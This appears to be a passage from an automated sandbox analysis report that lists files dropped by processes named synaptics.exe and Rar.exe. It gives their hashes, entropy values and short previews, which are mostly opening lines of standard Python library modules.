                                                                                                                                                                                                                                  Process:C:\Users\Public\M20EKMMEH2\synaptics.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66902
                                                                                                                                                                                                                                  Entropy (8bit):5.227788604327694
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:pdNUv9zPwqY+L88QliC9Xxa2F3rnM4mpcQS1w+xtZUuJpw2bEOrQ0aWsV:pdylme88Qli8X82JrMFcT/yN1V
                                                                                                                                                                                                                                  MD5:29092DDE80486C3ABBDBE9E5FF66D05E
                                                                                                                                                                                                                                  SHA1:7D41A18D4E02EB9F620A0D49D14193A0340BFCC9
                                                                                                                                                                                                                                  SHA-256:5E178D63D0E4350C70D2EA0DD0CF01748A4829D31298E56A641B78DAAC299013
                                                                                                                                                                                                                                  SHA-512:6EA9599AD3F361E229027EDEB6CBF1898B73F4B7EE27D352CEA4F6C55B690FE3799958D7F548FF5C7DBBECF4D03CB709FD3BE757242DFCF2A416A9E4BA7C3296
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:o........'-d=B.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...g.d...Z.d.d.l.Z.d.Z.d.Z.d.Z.d.Z.e.....Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.Z.d.Z.e.Z.d.Z.d.Z d.Z!e.d.e.d.e.d.e.d.e d.e!d.i.Z"e.e.e.e.e.e.e e!d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e.j(.)e%j*j+..Z,d d!..Z-e.....Z/d"d#..Z0d$d%..Z1e&e.d&..s.d'd(..Z2n.e..3..Z4d)d(..Z2d*d+..Z5e.j6e0e5e1d,....G.d-d...d.e7..Z8e8a9d/d0..Z:d1d2..Z;d3d4..Z<e...Z=[.G.d5d6..d6e7..Z>G.d7d8..d8e>..Z?G.d9d:..d:e>..Z@d;ZAe>eAf.e?d<f.e@d=f.d>..ZBG.d?d@..d@e7..Z.e...ZCG.dAdB..dBe7..ZDG.dCdD..dDe7..ZEG.dEdF..dFe7..ZFe..G..ZHg.ZIdGdH..ZJdIdJ..ZKG.dKdL..dLeF..ZLG.dMdN..dNeL..ZMG.dOdP..dPeM..ZNG.dQdR..dReM..ZOeOe...ZPePZQG.dSdT..dTe7..ZRdUdV..ZSdWdX..ZTG.dYdZ..dZe7..ZUG.d[d\..d\eF..ZVG.d]d^..d^eV..ZWeVaXG.d_d`..d`e7..ZYeWe...ZZeZeV_ZeUeVjZ..eV_[dadb..Z\d.dcdd..Z]dedf..Z^dgdh..Z_didj..Z`d.dk..dldm..Zadndo..Zbdpdq..Zcdrds..Zddtdu..Zedvdw..Zfe.f.dxdy..ZgeIf.dzd{..Zhd.d.liZiei.jeh..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):37442
                                                                                                                                                                                                                                  Entropy (8bit):4.3193858074775155
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:TTOLQcVmMtVTFx4mDAlisUCH7vZM242+xuGYV:TTOLpxtVz4mDAlisUCH7u242+A3V
                                                                                                                                                                                                                                  MD5:D404523DA4E85E6C5D23BA7F4CEC734F
                                                                                                                                                                                                                                  SHA1:EA99F93A2C9A4490FF834675455DDC9A3B1A8644
                                                                                                                                                                                                                                  SHA-256:CD1E433C7D3C56ABFA6197A3375F2AD435C030D2576437D6331EABA2256C5C86
                                                                                                                                                                                                                                  SHA-512:78DEF3DF3ADC8435981BC4A2CD2D44441DE5FC62D566DD774EC48D94A04347E70227B1857CD27D0857B903776A241EB43BD218588D54267A23CC9BB01147F33D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright 2001-2019 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):63003
                                                                                                                                                                                                                                  Entropy (8bit):4.426667243960486
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:yTAqnmKu/EaGYhxVRkXAHq94TB+nbGsbDDL2eLRBoljlZ:yTF7uS4xHkp1nbGsbDDL2cRBolH
                                                                                                                                                                                                                                  MD5:2B773B05650F410892A2CE9FE7516285
                                                                                                                                                                                                                                  SHA1:F739153F9C119A7671414CCFBEE9B761256563BC
                                                                                                                                                                                                                                  SHA-256:B70B1BE031F587D55D836E1E49995CA266487FE27F52B3F6FD4F9D7A8DEB48DD
                                                                                                                                                                                                                                  SHA-512:12608454D0CAA866D7DAFBFCFEFF11A07AACF103C4D0326A51F90C0157BB9E17B3AC2BA4F55590C3EF6249C367326A8A386021EF178A079D34F57591C58DF6CA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright 2001-2021 by Vinay Sajip. All Rights Reserved...#..# Permission to use, copy, modify, and distribute this software and its..# documentation for any purpose and without fee is hereby granted,..# provided that the above copyright notice appear in all copies and that..# both that copyright notice and this permission notice appear in..# supporting documentation, and that the name of Vinay Sajip..# not be used in advertising or publicity pertaining to distribution..# of the software without specific, written prior permission...# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING..# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL..# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR..# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER..# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT..# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13633
                                                                                                                                                                                                                                  Entropy (8bit):4.6079115173576595
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:1aniQNwG7fMpo6Yx6ip/qkFQ1bN54ga15DPi7kMP4:Ki2N62QN+xMw
                                                                                                                                                                                                                                  MD5:FACB9DDF63AA1A9A7BDA31E8B5D5D227
                                                                                                                                                                                                                                  SHA1:26387A733267073DE41848DAF103582DBCED3AB6
                                                                                                                                                                                                                                  SHA-256:DA46FA7C6C554A0705CF9A7318279B56FD5F62F71A55AC28E9579616F11129D6
                                                                                                                                                                                                                                  SHA-512:E26E99D48775E2C3135DEF115F0B05550E5FEF1C0B9FD6178799E339A9F92F3FA05262E81C160B822F4D676763213D5252BC365F76571947F7AF386C1E0CB90D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Interface to the liblzma compression library.....This module provides a class for reading and writing compressed files,..classes for incremental (de)compression, and convenience functions for..one-shot (de)compression.....These classes and functions support both the XZ and legacy LZMA..container formats, as well as raw compressed data streams..."""....__all__ = [.. "CHECK_NONE", "CHECK_CRC32", "CHECK_CRC64", "CHECK_SHA256",.. "CHECK_ID_MAX", "CHECK_UNKNOWN",.. "FILTER_LZMA1", "FILTER_LZMA2", "FILTER_DELTA", "FILTER_X86", "FILTER_IA64",.. "FILTER_ARM", "FILTER_ARMTHUMB", "FILTER_POWERPC", "FILTER_SPARC",.. "FORMAT_AUTO", "FORMAT_XZ", "FORMAT_ALONE", "FORMAT_RAW",.. "MF_HC3", "MF_HC4", "MF_BT2", "MF_BT3", "MF_BT4",.. "MODE_FAST", "MODE_NORMAL", "PRESET_DEFAULT", "PRESET_EXTREME",.... "LZMACompressor", "LZMADecompressor", "LZMAFile", "LZMAError",.. "open", "compress", "decompress", "is_check_supported",..]....import builtins..import io..import os..from _lzma
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):80945
                                                                                                                                                                                                                                  Entropy (8bit):4.32888996076859
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:inRVh+YxnKyQE4XXH7R7roIfNJMVNMTGDSSoQvV/RzqDSsz/WJ:gRnlxnKyQEAbxrvJMVNMTSrdJz7sz/WJ
                                                                                                                                                                                                                                  MD5:6F58186862F4DD316370EB2426974AD8
                                                                                                                                                                                                                                  SHA1:1271E30BB63D4B3C7D79619A0E00C8740B76C1AF
                                                                                                                                                                                                                                  SHA-256:1D5A2E2D2AA10962128083F200C3188B57543F80B6D9FADA3E0DB2BD3B4A8265
                                                                                                                                                                                                                                  SHA-512:7E1B520ED42DCEC7ACC50E8FE5E975F3E2FEF3D05172A680CA1CF1ADC1AF988F414635C66CFCE5ADEDA395F442A7E9EDC7EA0B27021943FE45788797468926CF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Read/write support for Maildir, mbox, MH, Babyl, and MMDF mailboxes."""....# Notes for authors of new mailbox subclasses:..#..# Remember to fsync() changes to disk before closing a modified file..# or returning from a flush() method. See functions _sync_flush() and..# _sync_close().....import os..import time..import calendar..import socket..import errno..import copy..import warnings..import email..import email.message..import email.generator..import io..import contextlib..from types import Generiuseras..try:.. import fcntl..except ImportError:.. fcntl = None....__all__ = ['Mailbox', 'Maildir', 'mbox', 'MH', 'Babyl', 'MMDF',.. 'Message', 'MaildirMessage', 'mboxMessage', 'MHMessage',.. 'BabylMessage', 'MMDFMessage', 'Error', 'NoSuchMailboxError',.. 'NotEmptyError', 'ExternalClashError', 'FormatError']....linesep = os.linesep.encode('ascii')....class Mailbox:.. """A group of messages in a particular place.""".... def __init__(self, path, facto
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9414
                                                                                                                                                                                                                                  Entropy (8bit):4.388993591955687
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Qld55VGNyMNKjLmlUk0qwNfpyBO6WBL2gbL9lWj+R/IDHMZYtfH6CzgEYLARQz:QldD7NflLd+j+RgDQA/6CsEYLARk
                                                                                                                                                                                                                                  MD5:5AA1FF0721FBA0760844039BB6B611B0
                                                                                                                                                                                                                                  SHA1:58A18A636D5B05BAAAAB72395B18ACF0800D8722
                                                                                                                                                                                                                                  SHA-256:E6E4C40533E07A294F7086F899005E03928EDE44CA5F9E532E47413147162E72
                                                                                                                                                                                                                                  SHA-512:204E569BE5A222B37A513F1C6430DEE0598486B3339CDDCA32BD72499564E58796CD9E4666E5509E4AD52FE4404F64601549F9AECD297004B1FFAD41D17EE3FB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Mailcap file handling. See RFC 1524."""....import os..import warnings..import re....__all__ = ["getcaps","findmatch"]......def lineno_sort_key(entry):.. # Sort in ascending order, with unspecified entries at the end.. if 'lineno' in entry:.. return 0, entry['lineno'].. else:.. return 1, 0...._find_unsafe = re.compile(r'[^\xa1-\U0010FFFF\w@+=:,./-]').search....class UnsafeMailcapInput(Warning):.. """Warning raised when refusing unsafe input"""......# Part 1: top-level interface.....def getcaps():.. """Return a dictionary containing the mailcap database..... The dictionary maps a MIME type (in all lowercase, e.g. 'text/plain').. to a list of dictionaries corresponding to mailcap entries. The list.. collects all the entries for that MIME type from all available mailcap.. files. Each dictionary contains key-value pairs for that MIME type,.. where the viewing command is stored with the key "view"..... """.. caps = {}.. lineno = 0..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23180
                                                                                                                                                                                                                                  Entropy (8bit):4.463605733550332
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:NdY3Vj3p7PEvA4bNqC+3c0t18PctlG8yklR5clRVSalR5lR1PIHmTnmMd0xVI/WH:Nid3pUA4jI1Q8yI2Vd5pIB74WEQVMe9b
                                                                                                                                                                                                                                  MD5:19FD48570E012C57FDB02C096AF8FD97
                                                                                                                                                                                                                                  SHA1:E5DCF9298B01E38FAF310FE4FBAFD9AB66E78B4A
                                                                                                                                                                                                                                  SHA-256:FF9E8DDA5C86DF9278D9054689EC16221009420C1282EE3DB5268621F1F61184
                                                                                                                                                                                                                                  SHA-512:527767F7DA3A22FE01F1B25AB26FE269BA9213C643EFBCD0E1B94FB3A710BE7D2B578171D23DB18CD69F9183A4BCF2235A0B9AF64FE92EC1495D04954EEE8F0A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Guess the MIME type of a file.....This module defines two useful functions:....guess_type(url, strict=True) -- guess the MIME type and encoding of a URL.....guess_extension(type, strict=True) -- guess the extension for a given MIME type.....It also contains the following, for tuning the behavior:....Data:....knownfiles -- list of files to parse..inited -- flag set when init() has been called..suffix_map -- dictionary mapping suffixes to suffixes..encodings_map -- dictionary mapping suffixes to encodings..types_map -- dictionary mapping suffixes to types....Functions:....init([files]) -- parse a list of files, default knownfiles (on Windows, the.. default values are taken from the registry)..read_mime_types(file) -- parse one file, return a dictionary or None.."""....import os..import sys..import posixpath..import urllib.parse....try:.. from _winapi import _mimetypes_read_windows_registry..except ImportError:.. _mimetypes_read_windows_registry = None....try:.. import winreg
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25086
                                                                                                                                                                                                                                  Entropy (8bit):4.356741564526823
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:KXf/9NmEvuo6xaWHV2EuKPZ5QdTl+pdEupOsP02pgbK+6WP6dY9n/CLP:UvcPaWHV21KeTl+pd1pOsM2SGgP6dY9c
                                                                                                                                                                                                                                  MD5:D696D103E7E451FFED860940CD1B06EA
                                                                                                                                                                                                                                  SHA1:DC0C9ABE84D6C0E952025F7F399BAF7F5461D99C
                                                                                                                                                                                                                                  SHA-256:92C6A7B834F56549F389C9C9924C29CDF6B2BDA10B43629B0F288C6F1B55C008
                                                                                                                                                                                                                                  SHA-512:E50232665631652810DA4187427B25E111E12C3216D1A9646F50E4EBCF1613748E6A24F5501204FBDC4BA00DF1EF0EE4D0E2E951C26CC1CB37784E802C437BEC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Find modules used by a script, using introspection."""....import dis..import importlib._bootstrap_external..import importlib.machinery..import marshal..import os..import io..import sys......LOAD_CONST = dis.opmap['LOAD_CONST']..IMPORT_NAME = dis.opmap['IMPORT_NAME']..STORE_NAME = dis.opmap['STORE_NAME']..STORE_GLOBAL = dis.opmap['STORE_GLOBAL']..STORE_OPS = STORE_NAME, STORE_GLOBAL..EXTENDED_ARG = dis.EXTENDED_ARG....# Old imp constants:...._SEARCH_ERROR = 0.._PY_SOURCE = 1.._PY_COMPILED = 2.._C_EXTENSION = 3.._PKG_DIRECTORY = 5.._C_BUILTIN = 6.._PY_FROZEN = 7....# Modulefinder does a good job at simulating Python's, but it can not..# handle __path__ modifications packages make at runtime. Therefore there..# is a mechanism whereby you can register extra paths in this map for a..# package, and it will be honored.....# Note this is a mapping is lists of paths...packagePathMap = {}....# A Public interface..def AddPackagePath(packagename, path):.. packagePathMap.setdefault(packagena
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5890
                                                                                                                                                                                                                                  Entropy (8bit):3.96552069041763
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:D94/ctpvs4RG9Q9TEHV0PhzqDGTfSLIOIqGf:D97Xvs4RGW9IHV2h2DGzSLIbf
                                                                                                                                                                                                                                  MD5:C58FE7C3FE3A0411A80C2969CC3D984F
                                                                                                                                                                                                                                  SHA1:9C23179052BFB6BBE11FE64A841F7105D3F422C7
                                                                                                                                                                                                                                  SHA-256:F25C823F35566AC08A0A16D965A2D73685A29328976E27A7B95F2EE5E90491F2
                                                                                                                                                                                                                                  SHA-512:A4624912B0BF87071437A46CE935FB991A9696D7979AE5603004ABD4ACC0917089893FAAEE2A8648B7F63A221C5DEB6B425881A9B6043126DD647948912A9487
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""An object-oriented interface to .netrc files."""....# Module and documentation by Eric S. Raymond, 21 Dec 1998....import os, shlex, stat....__all__ = ["netrc", "NetrcParseError"]......class NetrcParseError(Exception):.. """Exception raised on syntax errors in the .netrc file.""".. def __init__(self, msg, filename=None, lineno=None):.. self.filename = filename.. self.lineno = lineno.. self.msg = msg.. Exception.__init__(self, msg).... def __str__(self):.. return "%s (%s, line %s)" % (self.msg, self.filename, self.lineno)......class netrc:.. def __init__(self, file=None):.. default_netrc = file is None.. if file is None:.. file = os.path.join(os.path.expanduser("~"), ".netrc").. self.hosts = {}.. self.macros = {}.. try:.. with open(file, encoding="utf-8") as fp:.. self._parse(file, fp, default_netrc).. except UnicodeDecodeError:.. with open(file, enc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):42113
                                                                                                                                                                                                                                  Entropy (8bit):4.583525592980188
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:qPzJzOekTQNd2n1/xwEtyvLrQiIVnt7P+QVE:wzJOnGo1pzsa1PRO
                                                                                                                                                                                                                                  MD5:4D192F40E33C404168DDF0E1C27660AC
                                                                                                                                                                                                                                  SHA1:CB959A526E74C36557F164BE65E365CC9E305909
                                                                                                                                                                                                                                  SHA-256:5AE0C8F0379E3905D5A7A7DE6716C4B48DD7638D02870AFC7C5542231DE2E001
                                                                                                                                                                                                                                  SHA-512:D44DEF654244C7B0A61114DD8F78363A971B10193B6C009D726002A636D1D0535263373F11117183729DE80D8D2C48134E1740CC2589B3B056BA0B272DBF7BF1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""An NNTP client class based on:..- RFC 977: Network News Transfer Protocol..- RFC 2980: Common NNTP Extensions..- RFC 3977: Network News Transfer Protocol (version 2)....Example:....>>> from nntplib import NNTP..>>> s = NNTP('news')..>>> resp, count, first, last, name = s.group('comp.lang.python')..>>> print('Group', name, 'has', count, 'articles, range', first, 'to', last)..Group comp.lang.python has 51 articles, range 5770 to 5821..>>> resp, subs = s.xhdr('subject', '{0}-{1}'.format(first, last))..>>> resp = s.quit()..>>>....Here 'resp' is the server response line...Error responses are turned into exceptions.....To post an article from a file:..>>> f = open(filename, 'rb') # file containing article, including header..>>> resp = s.post(f)..>>>....For descriptions of all methods, read the comments in the code below...Note that all arguments and return values representing article numbers..are strings, not numbers, since they are rarely used for calculations..."""....# RFC 977 by Brian
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30319
                                                                                                                                                                                                                                  Entropy (8bit):4.519975623661739
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:oLxZcGnP1MszeSgz6CcuKky5TGjg8BNRKUa:s/3tCXzCuKky5L8vRKf
                                                                                                                                                                                                                                  MD5:7D31906AFDC5E38F5F63BFEEB41E2EF2
                                                                                                                                                                                                                                  SHA1:BBEFD95B28BAC9E58E1F1201AE2B39BBE9C17E5F
                                                                                                                                                                                                                                  SHA-256:E34494AF36D8B596C98759453262D2778A893DAA766F96E1BB1EF89D8B387812
                                                                                                                                                                                                                                  SHA-512:641B6B2171BB9AAE3603BE2CBCC7DD7D45968AFEB7E0A9D65C914981957BA51B2A1B7D4D9C6AEC88CF92863844761ACCDECA62DB62A13D2BC979E5279D7F87A0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Module 'ntpath' -- common operations on WinNT/Win95 pathnames.."""Common pathname manipulations, WindowsNT/95 version.....Instead of importing this module directly, import os and refer to this..module as os.path..."""....# strings representing various path-related bits and pieces..# These are primarily for export; internally, they are hardcoded...# Should be set before imports for resolving cyclic dependency...curdir = '.'..pardir = '..'..extsep = '.'..sep = '\\'..pathsep = ';'..altsep = '/'..defpath = '.;C:\\bin'..devnull = 'nul'....import os..import sys..import stat..import genericpath..from genericpath import *......__all__ = ["normcase","isabs","join","splitdrive","split","splitext",.. "basename","dirname","commonprefix","getsize","getmtime",.. "getatime","getctime", "islink","exists","lexists","isdir","isfile",.. "ismount", "expanduser","expandvars","normpath","abspath",.. "curdir","pardir","sep","pathsep","defpath","altsep",.. "
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2968
                                                                                                                                                                                                                                  Entropy (8bit):4.64153878996554
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:+W5wriD8gp26M8OjPZwZj33dyEUfIkiQ1J+4oEL8MyqBlJQGn7Iqaqy:+We2D3HM8OjPaDefIp74eMyqh+2y
                                                                                                                                                                                                                                  MD5:1E561E1AD3FE73F57D902D66C695658A
                                                                                                                                                                                                                                  SHA1:3DD20BA70AEC9AB04A3E69E17D0A2B10ECB43BC6
                                                                                                                                                                                                                                  SHA-256:AD86C5B0A9D8F82E9129900F69765AD079CBEF670CCFD0B463FBF608E79224AD
                                                                                                                                                                                                                                  SHA-512:B8E8AB92A11C66FE1A0D40C15F4D1071772EF1B0FBFE8F2A25793F6BD9704BC6BB6103E9FD619874774581E67C02D99D5143DCD6678E69F9C10EC7A3E20086B0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Convert a NT pathname to a file URL and vice versa.....This module only exists to provide OS-specific code..for urllib.requests, thus do not use directly..."""..# Testing is done through test_urllib.....def url2pathname(url):.. """OS-specific conversion from a relative URL of the 'file' scheme.. to a file system path; not recommended for general use.""".. # e.g... # ///C|/foo/bar/spam.foo.. # and.. # ///C:/foo/bar/spam.foo.. # become.. # C:\foo\bar\spam.foo.. import string, urllib.parse.. # Windows itself uses ":" even in URLs... url = url.replace(':', '|').. if not '|' in url:.. # No drive specifier, just convert slashes.. if url[:4] == '////':.. # path is something like ////host/path/on/remote/host.. # convert this to \\host\path\on\remote\host.. # (notice halving of slashes at the start of the path).. url = url[2:].. components = url.split('/').. # make sure not to co
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10741
                                                                                                                                                                                                                                  Entropy (8bit):4.539923490195961
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:gPOPzegOJGFvwyWWF0/zE0JeCQ29efwBlp7bv7ab4/g:gPOPzevyqzEf2AwfW4I
                                                                                                                                                                                                                                  MD5:7769EC6B9C5D9BDCB77C0B8C0DD455B7
                                                                                                                                                                                                                                  SHA1:133C707D9D0A624B0FF3053ABC2E242B19DD4597
                                                                                                                                                                                                                                  SHA-256:2C6B8B3497379DCA72B20396651DC66E19105E0068617E2278FD4041CE9E1B5E
                                                                                                                                                                                                                                  SHA-512:6A6626FB1314D17DA1CE1C1E60C45C07B1914C1B3503BB103965024F72D290FBCF6DE9A0664807EAA77458F98B84677D451027EE0E1B95817C9AC79CDA2D2F21
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) for numbers, according to PEP 3141.....TODO: Fill out more detailed documentation on the operators."""....from abc import ABCMeta, abstractmethod....__all__ = ["Number", "Complex", "Real", "Rational", "Integral"]....class Number(metaclass=ABCMeta):.. """All numbers inherit from this class..... If you just want to check if an argument x is a number, without.. caring what kind, use isinstance(x, Number)... """.. __slots__ = ().... # Concrete numeric types must provide their own hash implementation.. __hash__ = None......## Notes on Decimal..## ----------------..## Decimal has all of the methods specified by the Real abc, but it should..## not be registered as a Real because decimals do not interoperate with..## binary floats (i.e. Decimal('3.14') + 2.71828 is undefined). But,..## abstract reals are expected to interoperate (i.e. R1
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6118
                                                                                                                                                                                                                                  Entropy (8bit):5.48724844773523
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:rAgeOM9nKfM157diUwhKV66jW+SYtpabTB3fYSn3T4yU879+L:kgFMs+Z5R66/SYSbTBPYUD0K9+L
                                                                                                                                                                                                                                  MD5:456CFAE710FCF7EE289077D31D81C422
                                                                                                                                                                                                                                  SHA1:CAAF1F38034028E6A82532CC87ADBE2AE87D3D11
                                                                                                                                                                                                                                  SHA-256:F352006FE369806030FB7A3BD2EF770BE711AEA0C0C4B6A4D983839BF20910E7
                                                                                                                                                                                                                                  SHA-512:3F426FCD7FD2B8AB74CAA5F6DE4E9A10552FE9A5180D09E69E95BA90C13912148B6517222BC9E5C669F524F8532E7EFD4A214F73AD73F2B33EA350D8E38A9ED7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.."""..opcode module - potentially shared between dis and other modules which..operate on bytecodes (e.g. peephole optimizers)..."""....__all__ = ["cmp_op", "hasconst", "hasname", "hasjrel", "hasjabs",.. "haslocal", "hascompare", "hasfree", "opname", "opmap",.. "HAVE_ARGUMENT", "EXTENDED_ARG", "hasnargs"]....# It's a chicken-and-egg I'm afraid:..# We're imported before _opcode's made...# With exception unheeded..# (stack_effect is not needed)..# Both our chickens and eggs are allayed...# --Larry Hastings, 2013/11/23....try:.. from _opcode import stack_effect.. __all__.append('stack_effect')..except ImportError:.. pass....cmp_op = ('<', '<=', '==', '!=', '>', '>=')....hasconst = []..hasname = []..hasjrel = []..hasjabs = []..haslocal = []..hascompare = []..hasfree = []..hasnargs = [] # unused....opmap = {}..opname = ['<%r>' % (op,) for op in range(256)]....def def_op(name, op):.. opname[op] = name.. opmap[name] = op....def name_op(name, op):.. de
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11211
                                                                                                                                                                                                                                  Entropy (8bit):4.573391166266157
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:oFe9H1gEi2lSRhgnxHKg4qa9lcDxtZifr6Rm6Qatv1S9gEKQbi5rVKVOOcLRJpht:42hwCEKQbi5zoy
                                                                                                                                                                                                                                  MD5:5CE128B0B666D733F0BE7DFF2DA87F7C
                                                                                                                                                                                                                                  SHA1:B73F3EA48ADA4ECA01FBED4A2D22076AD03C1F74
                                                                                                                                                                                                                                  SHA-256:4B14013B84FFE4BE36FC3A4B847006BA1182596612D2A2AB42A6E94FF990B462
